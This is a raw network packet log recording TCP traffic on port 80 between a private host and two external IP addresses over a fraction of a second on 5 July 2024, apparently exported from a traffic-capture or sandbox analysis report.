                                                                Jul 5, 2024 04:23:11.253103971 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.253109932 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.253118038 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.253144979 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.278773069 CEST4973580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:11.283906937 CEST804973577.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:11.285305023 CEST4973580192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:11.286109924 CEST4973780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:11.291048050 CEST804973777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:11.293349028 CEST4973780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:11.303788900 CEST4973780192.168.2.477.91.77.82
                                                                Jul 5, 2024 04:23:11.312104940 CEST804973777.91.77.82192.168.2.4
                                                                Jul 5, 2024 04:23:11.329945087 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.329956055 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.329966068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.329989910 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.329998970 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.329998970 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.330018044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.330024958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.330029011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.330039978 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.330049038 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.330063105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.330074072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.330077887 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.330104113 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.332906008 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.332918882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.332927942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.332954884 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.332982063 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.333070040 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333080053 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333096981 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333106995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333117008 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.333122015 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333132029 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.333132982 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333144903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333156109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333164930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.333174944 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333183050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.333185911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333198071 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333205938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.333209991 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333220959 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333228111 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.333230019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333242893 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333252907 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.333254099 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333271980 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333281994 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.333285093 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333292961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.333301067 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333313942 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.333318949 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.333368063 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.333368063 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.337635994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337654114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337686062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.337698936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337707043 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.337735891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337747097 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337747097 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.337757111 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337773085 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.337775946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337786913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337788105 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.337802887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337831020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.337842941 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.337863922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337873936 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337892056 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337901115 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.337902069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337913990 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337924957 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.337925911 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.337949038 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.337975025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.342603922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342691898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342703104 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342714071 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.342725992 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.342745066 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.342791080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342802048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342812061 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342820883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342829943 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.342833996 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342853069 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342863083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342864037 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.342873096 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.342875004 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342885971 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342896938 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342900038 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.342907906 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342921019 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.342925072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.342946053 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.342961073 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.342998028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343008995 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343019009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343039989 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343061924 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343064070 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343074083 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343085051 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343096972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343099117 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343108892 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343113899 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343122959 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343153000 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343183994 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343195915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343209028 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343219042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343230009 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343230963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343240976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343254089 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343260050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343267918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343291044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343295097 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343302011 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343312979 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343323946 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343326092 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343336105 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343339920 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343353033 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343359947 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343372107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343379974 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343383074 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343395948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343410015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343411922 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343434095 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343440056 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343442917 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343461037 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343471050 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343478918 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343504906 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343561888 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343570948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343581915 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343600035 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343604088 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343611956 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343615055 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343624115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343637943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343645096 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343648911 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343662024 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343668938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343683958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343708038 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343709946 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343719006 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343729973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343740940 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343740940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343751907 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343759060 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343766928 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343770027 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343787909 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343795061 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343825102 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343835115 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343844891 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343856096 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343863010 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343868017 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343878984 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343889952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343894958 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343909025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343914032 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343925953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343931913 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343936920 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343949080 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343955994 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.343962908 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.343980074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.344006062 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.420957088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.421008110 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.421145916 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.421156883 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.421161890 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.421170950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.421183109 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.421194077 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.421201944 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.421206951 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.421232939 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.421261072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.423809052 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.423824072 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.423835039 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.423856020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.423881054 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.423887014 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.423892975 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.423911095 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.423922062 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.423929930 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.423933029 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.423944950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.423953056 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.423965931 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.423970938 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.423979998 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.423991919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424005985 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.424009085 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424022913 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424034119 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.424042940 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.424077034 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.424084902 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424096107 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424107075 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424124002 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424129963 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.424134016 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424165964 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.424180984 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.424202919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424212933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424221992 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424232960 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424243927 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.424245119 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.424268961 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.424283028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.428587914 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428606987 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428617954 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428636074 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.428652048 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.428667068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428679943 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428705931 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.428740025 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428751945 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428761005 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428771973 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428775072 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.428792953 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428800106 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.428811073 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428822994 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.428823948 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428838015 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.428842068 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428848028 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.428864956 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.428869963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.428878069 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.428941965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.433585882 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433597088 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433607101 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433625937 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433635950 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433636904 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.433646917 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433670044 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.433670044 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433682919 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433691025 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.433695078 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433707952 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433711052 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.433737993 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.433759928 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.433792114 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433809042 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433820963 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433832884 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433835983 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.433847904 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.433855057 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.433877945 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.433892965 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434022903 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434031010 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434053898 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434072018 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434089899 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434089899 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434103966 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434114933 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434124947 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434127092 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434144020 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434153080 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434180021 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434189081 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434200048 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434216976 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434225082 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434236050 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434266090 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434273958 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434283972 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434303045 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434309959 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434314013 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434324026 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434326887 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434336901 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434340000 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434348106 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434351921 CEST804973285.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:23:11.434366941 CEST4973280192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:23:11.434380054 CEST4973280192.168.2.485.28.47.30
